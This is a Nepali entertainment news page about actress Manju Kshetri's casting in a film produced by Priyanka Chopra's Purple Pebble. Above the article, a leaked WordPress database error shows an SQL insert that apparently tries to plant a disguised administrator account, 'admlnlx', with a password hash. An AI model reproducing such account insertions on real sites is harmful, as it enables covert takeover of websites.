WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqU3ecBuZnuHQYQjm9VyE1TePYxPnp/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:44:03', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ ३ –
बलिउड अभिनेत्री प्रियंका चोपडाले निर्माण गर्न लागेको सिक्किम बेस्ड नेपाली सिनेमा पौवामा अभिनेत्री मन्जु क्षत्री छनौट भएकी छिन् ।
सन् २०१३ देखि अभिनय यात्रा थालेकी मञ्जुले नेपाली टेलिसिरियल मेरी बास्सैमा खड्का जीकी कान्छी श्रीमतीको भूमिका निभाएकी थिइन् । प्रियंका चोपडाको सिनेमामा मञ्जु अडिशन पछि फाईनल भएकी हुन् । मञ्जुले सिक्किम मनिपाल विश्वविद्यालयबाट एम.बि.ए सकेकी छिन् ।
प्रियंका चोपडाको होम प्रोडक्शन पर्पल पेबलबाट छनौट भएको भन्दै फोन आउँदा आफूलाई निकै खुसी लागेको मञ्जुले जानकारी दिएकी छिन् । पर्पल पेबलमा अहिले प्रियंकाकी आमा मधु चोपडा प्रमुख छिन् ।
फेबु्रअरी पहिलो सातादेखि वर्कशप सुरु हुने यो सिनेमाका लागि अझैँ पाँच जना कलाकारहरुको खोजी भइरहेको छ । सिनेमामा राजनीतिक अस्थिरताका कारण परिवारबाट अलग भएका दुई बालबालिकाको कथालाई समेटिने छ ।